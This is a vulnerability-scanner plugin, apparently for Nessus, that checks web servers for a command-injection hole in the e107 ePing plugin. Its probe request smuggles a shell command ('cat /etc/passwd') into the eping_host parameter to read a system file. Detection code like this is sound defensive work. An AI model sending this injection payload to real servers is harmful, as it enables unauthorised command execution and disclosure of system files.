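##############################################################################
#
# e107 ePing Remote Command Execution Vulnerability
#
# Copyright: OS2A and it's member companies
#
# Date Written: 2005/07/27
#
# $Revision: 1.1 $
#
#
# $Log: os2a_eping_remotecode_600148.nasl,v $
# Revision 1.1  2005/08/25 12:05:51  bchandra
# Issue #659 #518
#
# Revision 1.1  2005/07/27 10:51:32  drahul
# issue #518
#
#
#
#
# ------------------------------------------------------------------------
# This program was written by OS2A and/or it's member companies and is
# licensed under the GNU GPL license. Please see below for details. This
# header contains information regarding licensing terms under the GPL, and
# information regarding obtaining source code from the Author. Consequently,
# pursuant to section 3(c) of the GPL, you must accompany the information
# found in this header with any distribution you make of this Program.
# ------------------------------------------------------------------------
##############################################################################

# Plugin outline:
#   1. locate e107's ePing plugin (doping.php) under a few candidate paths;
#   2. if present, send one probe request that exercises the command
#      injection described in the advisory and report a hole when the
#      "Access denied." rejection of patched versions is missing.
# The probe is intrusive (it reaches the target's shell on unpatched
# installs), which is why the category is ACT_MIXED_ATTACK rather than a
# passive ACT_GATHER_INFO check.

if (description) {
    script_id(600148);
    script_bugtraq_id(13929);
    script_cve_id("CAN-2005-1949");
    script_copyright(english:"Copyright (C) 2005 OS2A");
    script_version ("$Revision: 1.1 $");
    # Intrusive check: a live payload is sent to the target.
    script_category(ACT_MIXED_ATTACK);
    script_family(english:"CGI abuses");
    script_name(english:"e107 ePing Remote Command Execution Vulnerability");
    script_summary(english:"Check for eping Remote Command Execution");

    desc["english"] = "
Overview :

ePing 1.02 (prior to 14-june-2005) and earlier versions is prone to a
remote command execution vulnerability. Due to this, an attacker can
supply arbitrary shell commands and have them executed in the context
of the server.

Impact :

This vulnerability can be exploited to facilitate various attacks
including unauthorized access to an affected computer.

Affected Platforms :

Any system running the affected software.

Solution :

Update to version 1.02 (Post 14-June-2005)
http://e107coders.org/download.php?view.991

References :

http://marc.theaimsgroup.com/?l=bugtraq&m=111835539312985&w=2

Risk factor : High";

    script_description(english:desc["english"]);
    script_dependencies("http_version.nasl");
    script_require_ports("Services/www", 80);
    exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
# Older http_func.inc versions may hand back 0 when no www port is known;
# fall back to the default rather than scanning port 0.
if (!port) {
    port = 80;
}

# Candidate locations of the plugin: the web root, a conventional /e107
# install directory, and every CGI directory the scanner already knows.
dirs = make_list("", "/e107", cgi_dirs());

foreach dir (dirs) {
    url = string(dir, "/e107_plugins/eping/doping.php");
    sendRequest = http_get(item:url, port:port);
    receiveResponse = http_keepalive_send_recv(port:port, data:sendRequest, bodyonly:1);

    # A NULL body means the server stopped answering; nothing left to test.
    if (receiveResponse == NULL) {
        exit(0);
    }

    # The plugin is taken to be present when a bare request to doping.php
    # returns this banner; only then is the intrusive probe sent.
    if ("Invalid operation - potential hacking attempt" >< receiveResponse) {
        # Probe request (payload unchanged from the original check).
        url = string(url, "?eping_cmd=ping%20-n&eping_host=127.0.0.1;" +
                          "cd%20/;cat%20/etc/passwd&eping_count=2");
        sendRequest = http_get(item:url, port:port);
        receiveResponse = http_keepalive_send_recv(port:port, data:sendRequest, bodyonly:1);

        # FIX: a dropped (NULL) response used to fall through to the
        # "Access denied." test below and was reported as a hole because
        # the substring is trivially absent from an empty body. Treat it
        # as inconclusive instead.
        if (receiveResponse == NULL) {
            exit(0);
        }

        # Presumably the fixed plugin rejects the injected host string with
        # "Access denied."; its absence is what the check reports on.
        # NOTE(review): this is a negative match, so any other unexpected
        # page (e.g. an application error) is also reported as vulnerable.
        if ("Access denied." >!< receiveResponse) {
            security_hole(port);
            exit(0);
        }
    }
}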